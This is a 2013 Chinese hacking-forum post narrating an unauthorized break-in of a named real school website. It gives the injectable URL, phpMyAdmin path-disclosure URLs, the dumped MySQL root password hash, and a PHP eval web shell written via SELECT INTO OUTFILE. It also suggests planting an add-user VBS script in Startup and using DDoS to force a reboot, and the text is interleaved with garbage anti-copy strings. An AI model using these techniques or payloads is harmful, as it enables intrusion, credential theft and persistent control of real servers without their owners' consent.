找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2850|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏) l7 P! ~2 f; Q9 u
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!0 l' [; V0 m4 M. B* R. F8 p

- x! e* N/ z4 W2 }2 T+ y' O9 j/ L4 x9 P. y% d* v$ _  S

0 H( ~9 V' P& q1 _' r常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
4 {0 L! Y$ ^; J9 ]! M6 s4 Z' z1 W8 o, ]0 q; N/ L% o4 `* T# }8 {
那么想可以直接写入shell ,getshell有几个条件:
/ u; T) o$ C+ N- U$ m/ R$ t" Z# A7 l
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
0 y$ D: z+ \# F6 `( K) \7 G  x! s* s: _- x5 e
试着爆绝对路径:
6 \: S- F# Q1 k6 G1./phpMyAdmin/index.php?lang[]=1  * F5 ?# p! t2 E, N
2./phpMyAdmin/phpinfo.php  5 o3 E" q7 X1 D3 O! K& k4 ?
3./load_file()  
; s4 {! B6 i: V3 n. S" s4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 m& a0 y9 E4 w2 w2 g! S* R/ M5./phpmyadmin/libraries/select_lang.lib.php  
( j/ V& i' e- {7 _( H8 j" k- ]6./phpmyadmin/libraries/lect_lang.lib.php  
" A# O5 l; o* r  f& `7./phpmyadmin/libraries/mcrypt.lib.php   4 [; ]0 B& Q& K4 T. Z# i
8./phpmyadmin/libraries/export/xls.php  
% V" X) D" o  n/ P* r6 b
( g  A5 Z1 z0 ?9 G3 Q均不行...........................! }* Y- O; ?% k9 _
8 x. f$ }/ }( Y- ^7 S  c  j) X
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
* N  R& I- I, T: R: R; x- N( }
) F$ |. o+ t* g  E/ x7 o. }, B权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
- z9 w' X$ i& G: S  a& e5 F: I" E% S3 t1 ?9 b! K) m- u2 ?* v1 P( K
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
7 c( ]! s: T9 s7 {/ w/ ]  ]# H8 d" v/ I" e
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........4 _! J% ~6 W- M; d
" F8 t7 d2 j. g. W% ]
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
7 Z2 {' x2 f. X2 i& {3 W
8 |: @  W* S! ~% f$ g6 g# ohttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
9 K% I( L. w# t  F. e1 T& \6 f5 r2 @
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( ?# |! m  Y, F

) C" A0 B3 ~1 \成功读到root密码:2 ?9 M4 b. S1 F/ \2 V% g. ~6 L

% X7 @; s% y) Y2 ^0 V1 C5 s, p17---- r(0072)* X2 h; z$ [, d7 s* `* a
18---- o(006f)9 m) k) {$ ]9 f2 w; {  h6 e
19---- o(006f)
" [- Z# h% C4 d9 c- }20---- t(0074)
- I" O. s0 t5 W! D2 ^$ c21---- *(002a)+ C# b. H0 D1 P6 A" L2 I
22---- 8(0038)
6 j' R6 h) ], o6 C% A8 n6 T) S23---- 2(0032)
9 d0 U2 T5 X, B. b$ Y- l+ t! f24---- E(0045)
# W- t5 R' C4 `5 Y8 Y$ L& p25---- 1(0031)
% h4 Y) K  l, ]: P/ u26---- C(0043)
# y- D  j  m6 I( W3 {) P27---- 5(0035)4 c: z1 [$ k" J/ B% h* K
28---- 8(0038)
5 i6 w* T0 ]1 V' C6 \" h$ K29---- 2(0032)
! m1 ~6 c& B/ x' u30---- 8(0038)
/ A& ?# x0 d; S5 A* y3 q% o31---- A(0041)
  m0 W& B; U2 |32---- 9(0039)  Q9 i* M5 c, J/ t1 {9 E
33---- B(0042)% u  R" V# G* q9 ?
34---- 5(0035)
+ n$ i* R& Q1 |' R7 ^: J; y' i35---- 4(0034)
8 I3 K+ l$ g8 Z36---- 8(0038)& V# p7 j% E/ z
37---- 6(0036)
. p' }9 Q  ?0 j* q3 I4 c/ _0 w7 z% N38---- 4(0034)
6 Z  \. F) U9 l5 p! i$ w0 s0 {0 k39---- 9(0039)
: h" I  e' v$ C4 z$ z) Q1 t* B) W40---- 1(0031)
7 d. Q+ b/ W4 W+ A& h41---- 1(0031)- O$ t+ j; v$ [( X  O# I  R) d2 |
42---- 5(0035)
. s4 F5 x# _3 ?$ L; ]43---- 3(0033)
& U3 Y  f) H+ _- |44---- 5(0035)
" `# R0 \; U. g; R45---- 9(0039)
, o7 G1 F9 W3 `; ?/ |, k46---- 8(0038)# f- x# B/ w9 @' K1 h1 z+ o! H
47---- F(0046)
+ v7 X; [& @' M' R: g48---- F(0046)* [6 Z7 H6 S  H& v. E
49---- 4(0034)2 e4 q" O) t; l& F1 M
50---- F(0046)
2 H. S$ H/ w9 Z2 n2 A# y0 X51---- 0(0030). p- F. `2 e' i" o2 N
52---- 3(0033). t: V% ?" U! a2 [
53---- 2(0032)
6 D9 c( S; W; J4 ^5 o) u4 Z% p8 C54---- A(0041)
# X9 r7 z' s. Y  o3 x6 e55---- 4(0034). p0 S0 i$ d' Y# W
56---- A(0041)7 v: D0 Z  B4 c/ s3 C
57---- B(0042)2 L8 t1 I2 A/ E' r0 E
58---- *(0044)
) w5 X/ f$ q- A0 \59---- *(0035)5 \, c/ o: n9 l  Q; F5 s
60---- *(0041)
: h& |# w/ K6 G  s& e. R: b61---- *0032)6 y+ Q) s0 m; h" f  d, ?

6 c' x. P5 u$ t, ?解密后成功登陆phpmyamin
$ e" }* N1 B2 E0 _7 M1 l                          9 J4 T" b; [+ \. C/ B/ L
* w2 P! P( A4 @5 r1 H$ _7 L
                             5 |/ w4 H- O1 s% H. e6 p" Z

/ D- O" V( x& ^找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( }; k8 n9 c/ n1 s
! m- k2 O7 u: x" r+ u5 A成功执行,拿下shell,菜刀连接:
# t' H% C) X+ u' i* d/ S0 \) m: `& R- C
服务器不支持asp,aspx,php提权无果...................( C6 C9 y5 G& J7 h7 @& j( A

2 N$ ]1 S, X& g但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
% b5 C( H5 X  g% \1 M1 ]! W
服务器上已经有个隐藏帐号了
6 Q* L( H) ?. [
别名     administrators
- ?# o3 g& F/ Q5 K7 a, X0 f+ U, P注释     管理员对计算机/域有不受限制的完全访问权

+ O) g. {1 m4 [: M
成员
& R( c, }7 L1 ]  W6 j  p
-------------------------------------------------------------------------------3 @7 w4 N& S6 c
admin# z* g" ~. b, u' P' r9 N7 }
Administrator# ]+ T. r8 E. P1 Y$ s, Y2 U+ d
slipper$1 E  H, l- g3 J. r5 Y0 \) N
sqluser$ Z7 H8 S; {& V5 l) P6 O
命令成功完成。
7 I! l% `9 C, M* {0 a& Y1 ]7 o- M" {8 y  b& h2 n
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。- ]' N5 H2 a: P. Z9 ~9 b7 A; i2 q
4 I* P9 ?9 R- d- d0 q( n' O
ddos服务器重启,不然就只能坐等服务器重启了...............................
9 l9 T% Q1 I5 c1 c, y* \/ Y, G* R" A2 c, d2 H  C+ c
      
( n/ U/ B/ V* H; }! S8 \7 K

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表